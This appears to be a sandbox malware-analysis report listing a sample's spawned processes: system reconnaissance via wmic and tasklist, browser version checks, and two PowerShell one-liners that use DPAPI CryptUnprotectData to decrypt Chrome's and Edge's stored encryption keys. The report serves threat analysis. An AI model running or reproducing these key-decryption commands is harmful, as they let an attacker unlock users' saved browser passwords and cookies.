                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:wmic path win32_videocontroller get caption
                                                                                  Imagebase:0x7ff7d45f0000
                                                                                  File size:576'000 bytes
                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:09:03:06
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:09:03:07
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:tasklist
                                                                                  Imagebase:0x7ff60ccd0000
                                                                                  File size:106'496 bytes
                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:09:03:07
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:09:03:08
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:wmic os get Caption
                                                                                  Imagebase:0x7ff7d45f0000
                                                                                  File size:576'000 bytes
                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:09:03:08
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:09:03:08
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:wmic os get Version
                                                                                  Imagebase:0x7ff7d45f0000
                                                                                  File size:576'000 bytes
                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:09:03:08
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x520000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:09:03:10
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:10
                                                                                  Start time:09:03:10
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:11
                                                                                  Start time:09:03:12
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:12
                                                                                  Start time:09:03:12
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:13
                                                                                  Start time:09:03:13
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:tasklist
                                                                                  Imagebase:0x7ff60ccd0000
                                                                                  File size:106'496 bytes
                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:14
                                                                                  Start time:09:03:13
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:15
                                                                                  Start time:09:03:15
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:16
                                                                                  Start time:09:03:15
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:17
                                                                                  Start time:09:03:19
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
                                                                                  Imagebase:0x7ff788560000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:18
                                                                                  Start time:09:03:19
                                                                                  Start date:29/10/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:4.1%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:100%
                                                                                    Total number of Nodes:4
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 1380 7ffd9bab52ae 1381 7ffd9bab52ca 1380->1381 1382 7ffd9bab53c7 CryptUnprotectData 1381->1382 1383 7ffd9bab5443 1382->1383

                                                                                    Executed Functions

                                                                                    Function 00007FFD9BAB52AE Relevance: 1.7, APIs: 1, Instructions: 224encryptionCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1840293975.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_7ffd9bab0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 04ca9712f9fd688af1c25ae66fac980d86b07019c4c05b5f4bab1f7f5653a9b2
                                                                                    • Instruction ID: 3e21e7f80b4e5eea02b906fe32561ece0d36cc47a5c6068574c4a55a21b40f77
                                                                                    • Opcode Fuzzy Hash: 04ca9712f9fd688af1c25ae66fac980d86b07019c4c05b5f4bab1f7f5653a9b2
                                                                                    • Instruction Fuzzy Hash: 5D512971A1CA4C5FD758EB6C9C16AB97BE0FF59311F0042BEE45DC3293DE64A8018B82

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.9%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:4
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 1622 7ffd9bad52ae 1623 7ffd9bad52ca 1622->1623 1624 7ffd9bad53c7 CryptUnprotectData 1623->1624 1625 7ffd9bad5443 1624->1625

                                                                                    Executed Functions

                                                                                    Function 00007FFD9BAD52AE Relevance: 1.7, APIs: 1, Instructions: 223encryptionCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000011.00000002.1936538960.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_17_2_7ffd9bad0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: CryptDataUnprotect
                                                                                    • String ID:
                                                                                    • API String ID: 834300711-0
                                                                                    • Opcode ID: 4f575ef8ee0e62aee00c22dc050cb005d63ff75b8adf0af659dfa94aa7899616
                                                                                    • Instruction ID: c278cfab9d5aca69f5298c4483133ede3a583d4f579b1a161c54335a54c5a21f
                                                                                    • Opcode Fuzzy Hash: 4f575ef8ee0e62aee00c22dc050cb005d63ff75b8adf0af659dfa94aa7899616
                                                                                    • Instruction Fuzzy Hash: 1B510971A1CA8C4FD758EB6C9C166B97BE1FF99311F0042BEE44DC3292DE64A8458782